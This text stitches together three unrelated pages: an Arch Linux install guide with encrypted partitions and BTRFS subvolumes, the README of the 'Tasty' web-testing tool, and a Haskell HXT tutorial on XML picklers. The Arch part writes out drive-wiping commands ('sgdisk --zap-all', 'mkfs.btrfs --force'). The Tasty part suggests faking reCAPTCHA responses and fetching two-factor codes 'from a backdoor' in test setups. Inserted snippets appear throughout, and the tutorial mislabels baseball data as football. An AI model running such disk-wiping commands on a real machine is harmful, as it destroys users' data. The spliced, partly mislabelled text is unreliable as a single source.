When designing picklers, one must be careful to put enough markup into the XML structure to read the XML back without the need for a lookahead and without any ambiguities. The simplest case of a non-working pickler is a pair of primitive picklers, e.g. for some text. In this case the text is written out and concatenated into a single string; when parsing the XML, there will only be a single text node and the pickler will fail because of a missing value for the second component. So at least every primitive pickler must be combined with an xpElem or xpAttr.

Please do not try to convert a whole large database into a single XML file with this approach. This will run into memory problems when reading the data, because of the DOM approach used in HXT. In the HXT distribution, there is a test case in the examples dir performance, where the pickling and unpickling is done with XML documents containing 2 million elements. This is the limit for a 1G Intel box (tested with ghc 6.8).

There are two strategies to overcome these limitations. The first is a SAX-like approach, reading in simple tags and text elements and not building a tree structure, but writing the data instantly into a database. For this approach the Tagsoup package can be useful. The disadvantage is the programming effort for collecting and converting the data. The second and recommended way is to split the whole bunch of data into smaller pieces, unpickle these, and link the resulting documents together by the use of hrefs.
https://wiki.haskell.org/index.php?title=HXT/Conversion_of_Haskell_data_from/to_XML&diff=prev&oldid=20633
Details
- Type: Improvement
- Status: Open
- Priority: Major
- Resolution: Unresolved
- Affects Version/s: X10 2.2
- Component/s: X10 Compiler: Front-end Error Messages
- Labels: None

Description

import x10.compiler.*;

class Dood {
    static class IDed {
        protected static val counts = [0 as Int, 0];
        val id: Float;
        public def this(kind:Int) {
            this.id = this.count(kind);
        }
        @NoThisAccess def count(kind:Int) : Float = ++counts(kind % 2);
        public def toString() = "#" + id;
    }
    static class SubIDed extends IDed {
        protected static val subcounts = [0 as Int, 0, 0];
        @NoThisAccess def count(kind:Int) : Float {
            val subcount <: Int = ++subcounts(kind % 3);
            // No super-access, so we end up replicating code (or something)
            val supercount <: Float = ++counts(kind % 2);
            return supercount + 1.0f / subcount;
        }
    }
    static def main(Array[String]) {
        for(k in 1..10) {
            val id <: IDed = new IDed(k);
            Console.OUT.println("k=" + k + "; id=" + id);
        }
    }
}

The error message here is:

/Users/bard/x10/tmp/Dood.x10:12: No valid constructor found for Dood.IDed().
1 error.

A better error message might point out that some auto-generated code (the SubIDed ctor) is trying to call some other auto-generated code which isn't there. This is an admittedly tricky situation to explain in a pithy one-line error message, but we might do better with:

/Users/bard/x10/tmp/Dood.x10:12: Automatically generated constructor Dood.SubIDed() calls super(), but the superclass Dood.IDed does not have a constructor that matches this call.

Activity
- David Grove: defer to 2.4.2
- David Grove: bulk defer to 2.4.3
- David Grove: bulk defer to 2.4.4
- David Grove: bulk defer to 2.5.2
- David Grove: bulk defer to 2.5.3
- bulk defer of open issues to 2.2.2
http://jira.codehaus.org/browse/XTENLANG-2759?focusedCommentId=278711&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel
20 September 2012 03:34 [Source: ICIS news]

SINGAPORE (ICIS)--State-owned refiner Indian Oil has sold by tender 36,000-38,000 tonnes of naphtha for loading in the first half of October, traders said on Thursday.

The company sold 30,000 tonnes of naphtha for loading from Kandla on 8-10 October to the Oil Company of the Azerbaijan Republic (SOCAR) at a premium of $26-27/tonne (€20-21/tonne) to Middle East quotes FOB (free on board), they said.

To Vitol, Indian Oil sold 6,000-8,000 tonnes of naphtha for loading from Haldia on the same dates at a discount of $45/tonne, they said.

The cargo ex-Haldia contained a high amount of methyl tertiary butyl ether (MTBE), they added. MTBE is used as an additive to boost octane levels in gasoline.

Indian Oil previously sold by tender 35,000-40,000 tonnes of naphtha for loading from Dahej on 1-3 October to SOCAR at a premium of more than $40
http://www.icis.com/Articles/2012/09/20/9597037/indian-oil-sells-36000-38000-tonnes-h1-october-naphtha.html
Report of the Remuneration Committee (continued)

Directors' interests in shares (subject to audit)

Name                       Total shares and voting rights    Percentage of capital
Antonio Vázquez            512,291                           0.024
Willie Walsh               1,656,082                         0.078
Marc Bolland               0                                 0.000
Patrick Cescau             0                                 0.000
Enrique Dupuy de Lôme      466,807                           0.022
Baroness Kingsmill         2,000                             0.000
James Lawrence (1)         326,500                           0.016
María Fernanda Mejía       100                               0.000
Kieran Poynter             15,000                            0.001
Emilio Saracho             0                                 0.000
Dame Marjorie Scardino     100                               0.000
Alberto Terol              16,900                            0.001
Total                      2,995,780                         0.140

(1) Held as IAG ADSs (one IAG ADS equals two IAG shares).

There have been no changes to the shareholdings set out above between December 31, 2016 and the date of this report.

Share scheme dilution limits

The Investment Association sets guidelines that restrict the issue of new shares under all the Company's share schemes in any ten year period to 10 per cent of the issued ordinary share capital and restrict the issues under the Company's discretionary schemes to 5 per cent in any ten year period. At the annual Shareholders' Meeting on June 18, 2015 the Company was given authority to allocate up to 67,500,000 shares (3.31 per cent of the share capital) in 2015, 2016, 2017 and 2018. Of this a maximum of 7,650,000 shares could be allocated to executive directors under all IAG share plans for awards made during 2015, 2016, 2017 and 2018. At December 31, 2016, 2.33 per cent of the share capital had been allocated under the IAG share plans.

The highest and lowest closing prices of the Company's shares during the period and the share price at December 31, 2016 were:

At December 31, 2016: 441p
Highest in the period: 611p
Lowest in the period: 344p

Company performance graph and Chief Executive Officer of IAG 'single figure' table

The chart shows the value by December 31, 2016 of a hypothetical £100 invested on listing compared with the value of £100 invested in the FTSE 100 index over the same period. A spot share price has been taken on the date of listing, and a three month average has been taken prior to the year ends. The FTSE 100 was selected because it is a broad equity index of which the Company is a constituent, and the index is widely recognised.

INTERNATIONAL AIRLINES GROUP Annual Report and Accounts 2016

[Chart: IAG's total shareholder return (TSR) performance compared to the FTSE 100, £100 invested at listing in January 2011, tracked to December 2016]

The table below shows the CEO 'single total figure' of remuneration for each year since the creation of IAG in January 2011:

CEO of IAG – 'total single figure' of remuneration

Year   Total        Annual incentive                          Long-term incentive
2011   £1,550,000   £302,000 (18 per cent of maximum)         £251,594 vesting (35 per cent of maximum)
2012   £1,083,000   No annual incentive payment               Zero vesting
2013   £4,971,000   £1,299,375 (78.75 per cent of maximum)    £2,593,569 vesting (100 per cent of maximum)
2014   £6,390,000   £1,662,222 (97.78 per cent of maximum)    £3,640,135 vesting (85 per cent of maximum)
2015   £6,455,000   £1,360,000 (80 per cent of maximum)       £4,405,185 vesting (100 per cent of maximum)
2016   £2,462,000   £566,667 (33.33 per cent of maximum)      £807,741 vesting (50 per cent of maximum)

The single total figure of remuneration includes basic salary, taxable benefits, pension related benefits, annual incentive award, and long-term incentive vesting. The 2011 figure includes 20 days of remuneration in January 2011 paid by British Airways.

Percentage change in remuneration of the Chief Executive Officer of IAG compared to employees

The table below shows how the remuneration of the Chief Executive Officer of IAG has changed for 2016 compared to 2015. This is then compared to a group of appropriate employees. It has been determined that the most appropriate group of employees is all UK employees in the Group, comprising around 40,000 employees in total. To make the comparison between the CEO of IAG and employees as meaningful as possible, it was determined that as large a group as possible of employees should be chosen. The selection of all UK employees in the Group (roughly two-thirds of the entire Group's employees) meets these criteria. The majority of the 40,000 UK employees in the Group are employed by BA, but there are also a number of employees from all other companies in the Group based in the UK. It was determined that employees outside the UK would not be considered for the comparison, as very different employment market conditions exist in other countries.

Basic salary
- Chief Executive Officer of IAG: No basic salary increase for 2016.
- UK employees: Basic salary awards in 2016 at UK companies in the Group averaged around 2 per cent.

Annual incentive
- Chief Executive Officer of IAG: Decrease from £1,360,000 in March 2016 (covering the 2015 performance period) to £566,667 in March 2017 (covering the 2016 performance period). This represents a 58 per cent decrease.
- UK employees: Changes in overall annual incentive payments for 2016 vs. 2015 varied considerably around the Group, depending on the incentive design, financial performance, and non-financial performance at each individual company.

Taxable benefits
- Chief Executive Officer of IAG: No change in benefits policy. Actual payments decreased to £24,000 in 2016 from £27,000 in 2015.
- UK employees: No change in benefits policy. Overall costs 2016 vs. 2015 increased very slightly in line with inflation.
https://www.yumpu.com/en/document/view/59837104/annual-report-and-accounts-2016/95
- NAME
- SYNOPSIS
- DESCRIPTION
- FUNCTION
- DEPENDENCIES
- TODO
- BUGS
- AUTHOR
- SEE ALSO

NAME

File::Random - Perl module for random selecting of a file

SYNOPSIS

use File::Random qw/:all/;

my $fname  = random_file();
my $fname2 = random_file(-dir => $dir);

my $random_gif = random_file(-dir       => $dir,
                             -check     => qr/\.gif$/,
                             -recursive => 1);

my $no_exe = random_file(-dir => $dir, -check => sub {! -x});

my @jokes_of_the_day = content_of_random_file(-dir => '/usr/lib/jokes');
my $joke_of_the_day  = content_of_random_file(-dir => '/usr/lib/jokes');

# or the shorter
my $joke = corf(-dir => '/usr/lib/jokes');

my $word_of_the_day = random_line('/usr/share/dict/words');
my @three_words     = random_line('/usr/share/dict/words', 3);
# or
my ($title, $speech, $conclusion) = random_line('/usr/share/dict/words');

DESCRIPTION

This module simplifies the routine job of selecting a random file (as you can find in CGI scripts). It's done because writing that routine again and again is boring (and error-prone).

FUNCTION random_file

Returns a randomly selected file(name) from the specified directory. If the directory is empty, undef is returned. There are 3 options:

my $file = random_file( -dir       => $dir,
                        -check     => qr/.../,  # or sub { .... }
                        -recursive => 1         # or 0
                      );

Let's have a look at the options:

- -dir (-d or -directory)

Specifies the directory the file has to come from. If no -dir option is specified, a random file from the current directory will be used. That means '.' is the default for the -dir option.

- -check (-c)

With the -check option you can either define a regex every filename has to follow, or a sub routine which gets the filename as argument. The filename passed as argument includes the relative path (relative to the -dir directory or the current directory). The argument is passed implicitly as a localized value of $_ and it is also the first parameter on the argument array, $_[0]. Note that -check doesn't accept anything else than a regexp or a subroutine. A string like '/.../' won't work.
The default is no checking (undef).

- -recursive (-r or -rec)

Enables subdirectories to be scanned for files, too. Every file, independent of its position in the file tree, has the same chance to be chosen. Now the relative path from the given subdirectory or the current directory of the randomly chosen file is included in the file name. Every true value sets recursive behaviour on, every false value switches it off. The default is false (undef).

Note that I programmed the recursive routine very defensively (using File::Find). So switching -recursive on slows the program a bit :-) Please look at the File::Find module for any details and bugs related to recursive searching of files.

- unknown options

Gives a warning. Unknown options are ignored. Note that upper/lower case makes a difference. (Maybe, one day I'll change it.)

FUNCTION content_of_random_file (or corf)

Returns the content of a randomly selected random file. In list context it returns an array of the lines of the selected file; in scalar context it returns a multiline string with the whole file. The lines aren't chomped. This function has the same parameters and a similar behaviour to the random_file function. Note that the -check option still gets passed the filename and not the file content. Instead of the long content_of_random_file, you can also use the alias corf (but don't forget to say either use File::Random qw/:all/ or use File::Random qw/corf/).

FUNCTION random_line($filename [, $nr_of_lines])

Returns one or $nr_of_lines random lines from an (existing) file. If the file is empty, undef is returned. The algorithm used for returning one line is the one from the FAQ. See perldoc -q "random line" for details.

For more than one line ($nr_of_lines > 1), I use nearly the same algorithm. In particular, the returned lines aren't a sample, as a line could be returned doubled. The result of random_line($filename, $nr) should be quite similar to map {random_line($filename)} (1 .. $nr), only the last way is not so efficient, as the file would be read $nr times instead of once. It also works on large files, as the algorithm only needs two lines of the file at the same time in memory.

$nr_of_lines is an optional argument which is 1 by default. Calling random_line in scalar context with $nr_of_lines greater than 1 gives a warning, as it doesn't make a lot of sense. It also gives you a warning if $nr_of_lines is zero. You can also write something like

my ($line1, $line2, $line3) = random_line($fname);

and random_line will return a list of 3 randomly chosen lines. Although File::Random tries its best to find out how many lines you wanted, it's not an oracle, so

my @line = random_line($fname);

will be interpreted as

my @line = random_line($fname, 1);

EXPORT

None by default. You can export the function random_file with use File::Random qw/random_file/;, use File::Random qw/content_of_random_file/ or with the more simple use File::Random qw/:all/;. I didn't want to pollute namespaces, as I could imagine users write methods named random_file to create a file with random content. If you think I'm paranoid, please tell me, then I'll take it into the export.

DEPENDENCIES

This module requires these other modules and libraries:

Want

For the tests many more modules are also needed:

Test::More
Test::Exception
Test::Class
Set::Scalar
File::Temp
Test::Warn
Test::ManyParams

Test::Class itself needs the following additional modules:

Attribute::Handlers
Class::ISA
IO::File
Storable
Test::Builder
Test::Builder::Tester
Test::Differences

All these modules are needed only for the tests. You can work with the module even without them. These modules are only needed by my test routines, not by File::Random itself. (However, it's a good idea to install most of the modules anyway.)

TODO

A -firstline or -lines => [1 .. 10] option for content_of_random_file could be useful.
Also speed could be improved, as I tried to write the code very readable, but wasted sometimes a little bit speed. Please feel free to suggest me anything what could be useful. BUGS Well, because as this module handles some random data, it's a bit harder to test. So a test could be wrong, allthough everything is O.K.. To avoid it, I let many tests run, so that the chances for misproofing should be < 0.0000000001% or so. Even it has the disadvantage that the tests need really long :-( I'm not definitly sure whether my test routines runs on OS, with path seperators different of '/', like in Win with '\\'. Perhaps anybody can try it and tell me the result. [But remember Win* is definitly the greater bug.] This Program is free software. You can change or redistribute it under the same condition as Perl itself. AUTHOR Janek Schleicher, <bigj@kamelfreund.de> SEE ALSO Tie::Pick Data::Random Algorithm::Numerical::Sample 2 POD Errors The following errors were encountered while parsing the POD: - Around line 229: '=item' outside of any '=over' - Around line 295: You forgot a '=back' before '=head2'
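The single-line algorithm referenced above (see perldoc -q "random line") is the classic reservoir-sampling trick: read the file once, replacing the kept line with the k-th line at probability 1/k. As a sketch of the same idea outside Perl, here is a minimal Python version (an illustration of the algorithm, not code from File::Random):

```python
import random

def random_line(lines_iterable, rng=random):
    """Return one uniformly random item from an iterable in a single pass.

    The k-th line replaces the current pick with probability 1/k, so every
    one of the n lines ends up selected with probability 1/n overall.
    """
    pick = None
    for k, line in enumerate(lines_iterable, start=1):
        if rng.randrange(k) == 0:  # true with probability 1/k
            pick = line
    return pick  # None for an empty input, mirroring File::Random's undef
```

With a real file you would pass an open handle, e.g. random_line(open("data.txt")); only the current line and the current pick are ever held in memory.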
https://metacpan.org/pod/release/BIGJ/File-Random-0.17/Random.pm
CC-MAIN-2017-09
refinedweb
1,139
64.1
Hi, I’m trying to learn more about QGroundControl by compiling it and playing around. I’m able to build and run for linux, but when opening the form editor I get the errors with QtQuick imports: import QtQuick.Window 2.2 — QML module not found I’ve got this for several versions of QtCreator and Qt, now I use Qt Creator 4.11.1 and Qt libs 5.12.5, as recommended in the docs. The problem is that I can’t learn how the UI stuff works (signals etc) I’ve found a rather disheartening remark about this issue: “An import statement import QtQuick.Window 2.2 is always annotated with “QML module not found” error message.” “This bug is very old! But still present unfortunately. It seems to be occurred very chancy in any platform and then it will be present and make developers sad. I already have same problem from some month ago and it is still here after many updates. I have not any solution yet.” Is this still the case?
https://discuss.px4.io/t/building-qgroundcontrol-compiles-but-qtquick-window-not-found/15195/1
CC-MAIN-2020-10
refinedweb
176
75.71
GPIO operation and Flash memory

I have plans to use the Omega as a replacement for an MCU that has to monitor one signal to see whether it is on or has a meander (square wave) form. As there is no library for Python that supports falling edge detection, the check has to be made at double the frequency of the pulses. As GPIO information is written to a file, and files are stored in flash memory, I would like to estimate how long the Omega's memory will operate before becoming damaged (I did not find any indication that FRAM memory is used) if the GPIO is updated 10 times per second. Where am I wrong in my reasoning, or is it true that I cannot use the Omega as an MCU replacement?

Actually, I expected a lot of comments stating that I am not right. Does the silence mean that I was right, given the code I saw in the GPIOhelper class:

def getPin(self, pin):
    # Set direction as in
    fd = open(self.pinDirectionPath.replace("$", str(pin)), 'w')
    fd.write("in")
    fd.close()
    # Get value
    ...

I understood that every time the GPIO is read, a file will be overwritten. So in case I read the state 10 times per second, then after 100,000 cycles, or after 10,000 seconds, the flash memory will be damaged. Is there a way to somehow read the GPIO state and set the GPIO output using RAM? Or am I wrong because this file is not actually a file but a register? I'm not familiar enough with Linux.

- Lazar Demin administrators

Hi @Pux

So reading and setting the GPIOs through the file system is done through the sysfs interface, which is essentially a virtual filesystem provided by the Linux kernel to bring info on any connected hardware into userspace. The files in /sys/class/gpio that are read by the GPIOhelper you mentioned above are actually virtual files; my best guess is that the virtual file is only updated by the kernel when you attempt to read from it. AND, it's most likely not written to the flash memory at all.
In short, you should not have any problems with your flash memory getting damaged when using the GPIOs, even if it's updating 10 times a second. :)

Thank you for the answer. It is now clear that the Onion is the right device for building a controller in a short time.
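To make the sysfs point concrete: reading a GPIO value amounts to reading a small virtual file that the kernel synthesizes on demand, so no flash write is involved. A minimal Python sketch (the /sys/class/gpio layout is the standard Linux sysfs GPIO interface; the function name and pin number are illustrative, not the Omega library's API):

```python
def read_gpio(pin, sysfs_root="/sys/class/gpio"):
    """Read the current level (0 or 1) of an exported GPIO pin via sysfs.

    The 'value' file is a virtual file generated by the kernel at read
    time; nothing here touches flash storage.
    """
    with open("{}/gpio{}/value".format(sysfs_root, pin)) as fd:
        return int(fd.read().strip())
```

Polling this at 10 Hz is therefore just repeated kernel reads, not repeated flash writes.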
http://community.onion.io/topic/662/gpio-operation-and-flash-memory
CC-MAIN-2018-22
refinedweb
396
68.91
I’ve been reading up on Kubernetes a bit recently, and Jesse Hertz pointed me at an interesting item around Kubernetes security that illustrates the common problem of insecure defaults, so I thought it might be worth a post walking through the issue, mainly as a way for me to improve my Kubernetes knowledge but also because it could be useful for others who are deploying it. tl;dr: if you can get access to the kubelet API port you can control the whole cluster, and default configurations of Kubernetes are likely to make this possible, so be careful when setting up your clusters. So the issue I wanted to look at is this kubelet exploit. Basically the kubelet is the service which runs on Kubernetes nodes and manages things like the docker installation on that node, amongst other things. It receives commands from the API server, which co-ordinates the actions of the nodes in the cluster. The security problem lies in the fact that by default the kubelet service listens on a TCP/IP port with no authentication or authorization control, so anyone who can reach that port at a network level can execute kubelet commands just by issuing HTTP requests to the service. This means that an attacker who can get access to that port can basically take over the whole cluster pretty easily. The kubernetes team are well aware of this issue but a fix isn't planned until Kubernetes 1.5. There's also a workaround mentioned on the kubelet-exploit page which involves binding the kubelet to 127.0.0.1 and then connecting it to the kube-apiserver via SSH tunnels. To explore this problem I followed the kubeadm guide from the kubernetes site. Kubeadm is a tool which allows for clusters to be easily set up and appears to be somewhat modeled after some of the docker swarm commands. I followed the tutorial through to the point where I had a working cluster, taking all the defaults.
Then I deployed a container with some tools into the cluster. The scenario we're testing is that an attacker has gained access to a container in the cluster, and we'll see what they can do to take control of the cluster with only that access.

kubectl run -i -t badcontainer --image=kalilinux/kali-linux-docker

which, after a while for the image to download, gives us a bash shell running in a container on the cluster. So now we can scan round to see whether the port we're looking for is available. First add some tools to our build:

apt update
apt install nmap curl

Then scan the network. In this case my main network where the nodes are installed is 192.168.41.0/24:

nmap -sT -v -n -p10250 192.168.41.0/24

from that we get back a bunch of filtered ports but also three open ones, which are the IP addresses of my Kubernetes nodes.

Nmap scan report for 192.168.41.201
Host is up (0.00013s latency).
PORT      STATE SERVICE
10250/tcp open  unknown

Nmap scan report for 192.168.41.232
Host is up (0.000065s latency).
PORT      STATE SERVICE
10250/tcp open  unknown

Nmap scan report for 192.168.41.233
Host is up (0.00020s latency).
PORT      STATE SERVICE
10250/tcp open  unknown

Now we can use some of the commands mentioned in the exploit to start getting more access to the cluster. First up, let's enumerate our containers:

curl -sk | python -mjson.tool

This returns a list of the pods running on the node in JSON form, and also the images they're based on. The most interesting one here is

{
    "metadata": {
        "creationTimestamp": null,
        "name": "kube-apiserver-kube",
        "namespace": "kube-system",
        "uid": "0446d05fb9406214210e8d29397f8bf2"
    },
    "spec": {
        "containers": [
            {
                "image": "gcr.io/google_containers/kube-apiserver-amd64:v1.4.0",
                "name": "kube-apiserver",
                "resources": {}
            },
            {
                "image": "gcr.io/google_containers/pause-amd64:3.0",
                "name": "POD",
                "resources": {}
            }
        ]
    },

it's running the kube-apiserver image, so that'll be our API server.
As I mentioned earlier, the API server is basically the heart of the cluster, so access to it provides a lot of control over the cluster itself.

curl -k -XPOST "" -d "cmd=ls -la /"

lists the files in the root directory of that container, and if we run

curl -k -XPOST "" -d "cmd=whoami"

we get back the answer that every pentester likes to see, which is root!

So at this point, that's pretty bad news for the cluster owner. A rogue container should not be able to execute privileged commands on the API server of the cluster. So the next step in the attack would be to take over the cluster, for which the easiest way is likely to be getting control of the API server, as that lets us create new containers amongst other things.

If we do

curl -k -XPOST "" -d "cmd=ps -ef"

we can see the process list for the API server, which handily provides the path of the token file that Kubernetes uses to authenticate access to the API

PID   USER     TIME   COMMAND
    1 root     2:29   /usr/local/bin/kube-apiserver --v=4 --insecure-bind-address=127.0.0.1 --etcd-servers= --admission-control=NamespaceLifecycle,LimitRanger,ServiceAccount,PersistentVolumeLabel,DefaultStorageClass,ResourceQuota --service-cluster-ip-range=100.64.0.0/12 --service-account-key-file=/etc/kubernetes/pki/apiserver-key.pem --client-ca-file=/etc/kubernetes/pki/ca.pem --tls-cert-file=/etc/kubernetes/pki/apiserver.pem --tls-private-key-file=/etc/kubernetes/pki/apiserver-key.pem --token-auth-file=/etc/kubernetes/pki/tokens.csv --secure-port=443 --allow-privileged --etcd-servers=

here we can see that it's /etc/kubernetes/pki/tokens.csv so then we can just cat out that file

curl -k -XPOST "" -d "cmd=cat /etc/kubernetes/pki/tokens.csv"

and we get the token, which is the first field listed

d65ba5f070e714ab,kubeadm-node-csr,9738242e-8681-11e6-b5b4-000c29d33879,system:kubelet-bootstrap

Now we can communicate directly with the Kubernetes API like so

curl -k -X GET -H "Authorization: Bearer d65ba5f070e714ab"

this gives us easier control of the cluster
than we had from just running individual commands on it. We could persist with the HTTP API, but TBH I find it easier to use kubectl, so we can just download that and point it at our cluster with our newly acquired token.

wget
chmod +x kubectl
./kubectl config set-cluster test --server=
./kubectl config set-credentials cluster-admin --token=d65ba5f070e714ab

From here, the next step is to look at getting access to the underlying nodes. This can be achieved by mapping in a volume from the node to a container that we run. So if we create a file called test-pod.yml

apiVersion: v1
kind: Pod
metadata:
  name: test-pd
spec:
  containers:
  - image: nginx
    name: test-container
    volumeMounts:
    - mountPath: /test-pd
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      # directory location on host
      path: /etc

and start it up with

./kubectl create -f test-pod.yml

we can then run a command to cat out the /etc/shadow file of the underlying node

./kubectl exec test-pd -c test-container cat /test-pd/shadow

From there it's just a bit of password cracking needed and we get shell access to the underlying node. So from that we can see that there's definitely something to think about if you're going to run a Kubernetes cluster in production, i.e. protect access to the kubelet API port…
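The nmap step above is just checking whether TCP port 10250 answers; the same check can be scripted with a plain socket connect. A minimal Python sketch (the port number comes from the walkthrough; the function name is ours, not part of the original post):

```python
import socket

def kubelet_port_open(host, port=10250, timeout=1.0):
    """Return True if a TCP connect to host:port succeeds, which is the
    same signal nmap's -sT scan reports as 'open'."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False
```

Sweeping a /24 is then just a loop, e.g. [h for h in hosts if kubelet_port_open(h)] over the candidate node addresses.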
https://raesene.github.io/blog/2016/10/08/Kubernetes-From-Container-To-Cluster/
CC-MAIN-2018-51
refinedweb
1,251
59.43
WebServiceAttribute.Name Property

Gets or sets the name of the XML Web service.

Assembly: System.Web.Services (in System.Web.Services.dll)

The Service Description is generated when a user navigates to the URL for the XML Web service and supplies a query string of ?WSDL. Within the Service Description, the Name property identifies the local part of the XML qualified name for the XML Web service. The Name property is also used to display the name of the XML Web service on the Service help page. The Service help page is displayed when a prospective consumer navigates to the .asmx page for the XML Web service without specifying an XML Web service method name and its parameters.

An XML qualified name is used to disambiguate elements with the same name within an XML document. An XML qualified name consists of the following two parts separated by a colon: a namespace (or a prefix associated with a namespace) and a local part. The namespace consists of a URI reference and, for the purposes of the Service Description, is the value of the Namespace property. In general, a prefix, which acts like an alias to a URI, is associated with the namespace, so that all subsequent XML qualified names using the namespace can use the shortened prefix. The local part is a string beginning with a letter or underscore and containing no spaces. Therefore, the XML qualified name identifying an XML Web service in the Service Description is in the following format: Namespace:Name. For more information on XML qualified names, see.

Available since 1.1
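As a hypothetical illustration (not taken from the reference page itself), a service declared with Name = "StockService" and Namespace = "http://example.org/stocks" would surface in the generated Service Description roughly as follows, with the tns prefix standing in for the namespace URI:

```xml
<definitions xmlns:tns="http://example.org/stocks"
             targetNamespace="http://example.org/stocks">
  <!-- "tns" is the prefix bound to the Namespace property's URI;
       "StockService" is the local part taken from the Name property -->
  <service name="StockService">
    <port name="StockServiceSoap" binding="tns:StockServiceSoap" />
  </service>
</definitions>
```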
https://msdn.microsoft.com/en-us/library/system.web.services.webserviceattribute.name.aspx
CC-MAIN-2016-50
refinedweb
260
53.21
TouchableWithoutFeedback

If you're looking for a more extensive and future-proof way to handle touch-based input, check out the Pressable API.

Do not use unless you have a very good reason. All elements that respond to press should have a visual feedback when touched.

TouchableWithoutFeedback supports only one child. If you wish to have several child components, wrap them in a View. Importantly, TouchableWithoutFeedback works by cloning its child and applying responder props to it. It is therefore required that any intermediary components pass through those props to the underlying React Native component.

Usage Pattern

function MyComponent(props) {
  return (
    <View {...props} style={{ flex: 1, backgroundColor: '#fff' }}>
      <Text>My Component</Text>
    </View>
  );
}

<TouchableWithoutFeedback onPress={() => alert('Pressed!')}>
  <MyComponent />
</TouchableWithoutFeedback>;

Example

Reference

Props

accessibilityIgnoresInvertColors

accessible

When true, indicates that the view is an accessibility element. By default, all the touchable elements are accessible.

accessibilityLabel

Overrides the text that's read by the screen reader when the user interacts with the element. By default, the label is constructed by traversing all the children and accumulating all the Text nodes separated by space.

accessibilityHint

An accessibility hint helps users understand what will happen when they perform an action on the accessibility element when that result is not clear from the accessibility label.

delayLongPress

Duration (in milliseconds) from onPressIn before onLongPress is called.

delayPressIn

Duration (in milliseconds), from the start of the touch, before onPressIn is called.

delayPressOut

Duration (in milliseconds), from the release of the touch, before onPressOut is called.

disabled

If true, disable all interactions for this component.

hitSlop

This defines how far your touch can start away from the button. This is added to pressRetentionOffset when moving off of the button.
The touch area never extends past the parent view bounds and the Z-index of sibling views always takes precedence if a touch hits two overlapping views.

onBlur

Invoked when the item loses focus.

onFocus

Invoked when the item receives focus.

onLayout

Invoked on mount and on layout changes.

onLongPress

Called if the time after onPressIn lasts longer than 370 milliseconds. This time period can be customized with delayLongPress.

onPress

Called when the touch is released, but not if cancelled (e.g. by a scroll that steals the responder lock). The first function argument is an event in the form of PressEvent.

onPressIn

Called as soon as the touchable element is pressed and invoked even before onPress. This can be useful when making network requests. The first function argument is an event in the form of PressEvent.

onPressOut

Called as soon as the touch is released even before onPress. The first function argument is an event in the form of PressEvent.

nativeID

testID

Used to locate this view in end-to-end tests.

touchSoundDisabled Android

If true, doesn't play a system sound on touch.
http://reactnative.dev/docs/0.66/touchablewithoutfeedback
CC-MAIN-2022-21
refinedweb
462
50.33
I don’t know about you, but the main thing I’m interested in on any new mobile development platform, for some reason, is LISTS. I think I’m so fixated on lists because of the way the iPhone so successfully introduced the paradigm of list based navigation. Everything can be done in a series of lists (ok not really, but they are crucial to many apps!). Naturally then, the first thing I sought out to do on MonoDroid was to create a list. Easy, piece of cake… If you want to create a boring old list with a single line of text for each item. This is no doubt an important part of every developer’s Hello World development phase, but it doesn’t take long before you’re craving images, several text elements, and possibly even some checkboxes and/or buttons (easy there tiger). For every ListView in Android, there is a prince charming ListView Adapter to save the day. The most basic of examples which you’ve no doubt seen involve an ArrayAdapter of some sort, with the default Android.R.Layout.SimpleListItem or whatever it is called. BOOORING. What we need to do to make something exciting is create our own custom ListView Adapter. Now, you could use a SimpleAdapter to map fields to certain resource id’s of a layout, but if you look at a java example of this, ‘Simple’ quickly becomes a relative term. What I like to do is create my own adapter deriving from the BaseAdapter class (how fitting).
Here’s some code for my custom list adapter (explanation to follow):

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Android.App;
using Android.Content;
using Android.OS;
using Android.Runtime;
using Android.Views;
using Android.Widget;
using Android.Graphics.Drawables;

namespace MonoDroid.CustomList
{
    public class CustomListAdapter : BaseAdapter
    {
        Activity context;
        public List<Animal> items;

        public CustomListAdapter(Activity context) //We need a context to inflate our row view from
            : base()
        {
            this.context = context;

            //For demo purposes we hard code some data here
            this.items = new List<Animal>() {
                new Animal() { Name = "Elephant", Description = "Big and Gray, but what the hey", Image = Resource.drawable.elephant },
                new Animal() { Name = "Chinchilla", Description = "Little people of the andes", Image = Resource.drawable.chinchilla },
                new Animal() { Name = "Lion", Description = "Cowardly lion, anyone?", Image = Resource.drawable.lion },
                new Animal() { Name = "Skunk", Description = "Ello, baby. I am ze locksmith of love, no?", Image = Resource.drawable.skunk },
                new Animal() { Name = "Rhino", Description = "Most live to about 60, pretty old eh?", Image = Resource.drawable.rhino },
                new Animal() { Name = "Zebra", Description = "Stripes maybe not so great for hiding", Image = Resource.drawable.zebra },
                new Animal() { Name = "Squirrel", Description = "Nuts nuts, where's my nuts?!", Image = Resource.drawable.squirrel },
                new Animal() { Name = "Walrus", Description = "I am he as you are he as you are me", Image = Resource.drawable.walrus },
                new Animal() { Name = "Giraffe", Description = "Bigger than your ford pinto", Image = Resource.drawable.giraffe },
                new Animal() { Name = "Chicken", Description = "I'll take 2 eggs over easy", Image = Resource.drawable.chicken },
                new Animal() { Name = "Duck", Description = "He's all quacked up", Image = Resource.drawable.duck },
                new Animal() { Name = "Hawk", Description = "He needs to be on a t-shirt", Image = Resource.drawable.hawk },
                new Animal() { Name = "Lobster", Description = "We were at the beach...", Image = Resource.drawable.lobster },
                new Animal() { Name = "Pig", Description = "Babe, Orson, Piglet, whatever", Image = Resource.drawable.pig },
                new Animal() { Name = "Rabbit", Description = "Thumper is the best rabbit name ever", Image = Resource.drawable.rabbit },
                new Animal() { Name = "Turtle", Description = "Slow and steady wins the race", Image = Resource.drawable.turtle },
            };
        }

        public override int Count
        {
            get { return items.Count; }
        }

        public override Java.Lang.Object GetItem(int position)
        {
            return position;
        }

        public override long GetItemId(int position)
        {
            return position;
        }

        public override View GetView(int position, View convertView, ViewGroup parent)
        {
            //Get our object for this position
            var item = items[position];

            //Try to reuse convertView if it's not null, otherwise inflate it from our item layout
            // This gives us some performance gains by not always inflating a new view
            // This will sound familiar to MonoTouch developers with UITableViewCell.DequeueReusableCell()
            var view = (convertView ?? context.LayoutInflater.Inflate(Resource.layout.customlistitem, parent, false)) as LinearLayout;

            //Find references to each subview in the list item's view
            var imageItem = view.FindViewById(Resource.id.imageItem) as ImageView;
            var textTop = view.FindViewById(Resource.id.textTop) as TextView;
            var textBottom = view.FindViewById(Resource.id.textBottom) as TextView;

